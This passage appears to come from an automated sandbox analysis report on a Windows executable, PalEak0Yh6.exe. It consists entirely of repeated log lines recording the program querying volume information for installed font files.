                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
